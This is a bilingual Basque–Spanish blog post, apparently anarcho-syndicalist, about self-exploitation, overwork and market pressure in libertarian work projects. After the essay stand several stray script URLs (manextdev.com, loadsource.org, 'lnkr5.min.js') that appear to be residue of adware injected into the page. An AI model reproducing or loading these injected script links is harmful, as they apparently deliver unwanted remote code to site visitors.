Lan-baldintzak ingurune libertarioetan / Condiciones laborales en entornos libertarios

Beharrezkoa iruditzen zaigu lana antolatzeko modu berriak esperimentatzea (gaur egungo enpresa-eremuetatik kanpo) mundu berri bat eraikitzen joateko. Zoritxarrez, arazo larriak atzeman ditugu teorian libertarioak diren hainbat proiektu edo esperientziatan.

Aktibismo eta militantziaren izenean, lana errendimendu eta produktibitatearen parametroetara makurtzen da zenbait kasutan, eta ondorioz, autoesplotazio-egoerak sortzen dira: lanaldi luzeak, lan-erritmo altuak, oporrik edo jaiegunik ez… Proiektuarekin duzun konpromisoa beste ezer baino garrantzitsuagoa da. Halakotan, lan egiteko modua enpresa konbentzionalen parekoa da, baina okerragoa gainera, ezin dituzulako lan-eskubideak aldarrikatu, Estatuarekiko menpeko ez izatearren uko egin diozulako kontratupean lan egiteari.

Batzuetan, nahikoa da proiektua emaitzak ematen hastea edo ekoizpena handitu daitekeela ikustea, proiektuko zenbait kidek etekinak areagotzeko moduak sustatzeko, eta horrela, proiektua garatzeko eta intentsifikatzeko espektatibak eragiten dituzte, proiektukideentzat gehiegizkoak diren garapenak bultzatuz. Beste zenbaitetan, beharbada ez da desarrollismoaren eta errendimenduaren sareetan erori nahi, baina badirudi barruan daramagun “zomorro kapitalista” aktibatzen dela eta horrela erraz zaio Botereari gu eramaten jarraitzea, itxuraz proiektu libertario batean lan egiteko modu kapitalistak barruraino sartzen zaizkigularik, apenas ohartu gabe.

Proiektuaren “noranzkoan” ere gatazkak sortzen dira, erakundeak tarteko daudelako (tokiko administrazioak, lurraldekoak…) eta erakundeak ez daude pertsona eta kolektiboen bizitza aldatu nahian, lanaren emaitza merkatura eraman nahian baizik (ekintzailetza…).

Agroekologian argi adierazten den bezala,  eraldatzaile izateko ez da nahikoa produktuaren kalitatea edo produktua osasuntsua izatea edo ingurumena zaintzea; horrekin batera, langileen lan-baldintzak ere zaindu behar dira.

Ez dugu Estatuaren menpekoak izan nahi, ez dugu nahi proiektu libertarioak bere arautegi, hitzarmen eta legeen arauetara makurtzea. Baina horrek esan nahi du elkarren arteko laguntza eta zaintzak  erdigunean jarri behar ditugula, eta inguruan dugun komunitaterantz lan egin behar dugula, “zerbitzu bat ematearen” amarru kapitalistan erori gabe (horrek posizio bertikalean kokatuko gintuzke komunitatearekiko).

Horizontaltasunak proiektu hauetan ez du esan nahi denok berdin lan egitea (ikuspegi taylorista) baizik eta beharrak asebetetzeko moduak lantzea, eta jende guztiak ez ditu behar berdinak.

Hausnarketa hauek espero dugu baliagarriak izatea, uste baitugu anarkosindikalismoa ez dela soilik enplegatuak dauden pertsonen arazoak konpontzea, horrez gain bizimodu berriak eraiki behar ditugu zeinetan lana ez den opresorea izango.

Iturria/Fuente: pixabay.com

Aunque nos parece necesario que se experimenten nuevas formas de organización del trabajo (fuera de los ámbitos empresariales actuales) para ir construyendo un mundo nuevo, hemos detectado problemas graves en proyectos o experiencias de carácter teóricamente libertario.

En nombre del activismo y de la militancia, el trabajo puede ir conduciéndose hacia la misma estructura y formas basadas en el rendimiento y la productividad, conllevando situaciones de autoexplotación laboral, jornadas largas, ritmos de trabajo altos, nada de vacaciones ni días libres… El compromiso con el proyecto es lo primero. Esto hace que en realidad el proyecto no se pueda diferenciar de las empresas convencionales, con el agravante de que en estos casos ni siquiera puedes agarrarte a los derechos laborales, al renunciar a ellos por no querer ser dependientes del Estado.

A veces, es suficiente con que el proyecto empiece a brotar o a producir para que haya miembros que vean ya formas de lucro, generando expectativas de desarrollos no asumibles por las personas que componen el grupo. Otras veces, aun no queriendo caer en el desarrollismo y el rendimiento, parece que se activa el “bicho capitalista” que hace que el Poder nos siga conduciendo.

También surgen conflictos en el “hacia” del proyecto debido a la cooptación de las instituciones (locales, provinciales…) que no están por un cambio en la vida de las personas y colectivos sino en dirigir el producto del trabajo al mercado (emprendeduría…).

Igual que se dice sobre la agroecología, la perspectiva transformadora no es solo la calidad o la salubridad del producto o el cuidado del medio ambiente, tendrán que ser igual de importantes las condiciones laborales de la gente que trabaja.

Ya que no queremos ser dependientes del Estado, no queremos que los proyectos libertarios se rijan por las normas, los convenios o las leyes emanados de sus instituciones. Pero eso significa que hay que poner los cuidados en el centro, las formas de ayuda mutua y trabajar hacia la comunidad que nos rodea, sin caer en “dar servicio” (que nos colocaría en una situación vertical).

Las horizontalidades en estos proyectos no suponen que todo el mundo trabaje igual y lo mismo (enfoque taylorista) sino que trabajemos teniendo en cuenta la satisfacción de las necesidades, que no son iguales en toda la gente.

Estas son algunas reflexiones que queremos que nos vayan sirviendo, porque entendemos que el anarcosindicalismo no es solo resolver problemas de las personas empleadas sino también ir creando nuevas formas de vida en las que el trabajo no sea opresor.

 

 

//manextdev.com/1ca78463bfbb9a81df.js

 

https://manextdev.com/addons/lnkr5.min.jshttps://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52250x7335x&r=1533138329009https://manextdev.com/ext/1ca78463bfbb9a81df.js?sid=52250_7335_&title=FF_%5B603%5D_manappff.cool&blocks%5B%5D=31af2

Advertisements

Utzi erantzun bat

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Aldatu )

Google+ photo

You are commenting using your Google+ account. Log Out /  Aldatu )

Twitter picture

You are commenting using your Twitter account. Log Out /  Aldatu )

Facebook photo

You are commenting using your Facebook account. Log Out /  Aldatu )

Connecting to %s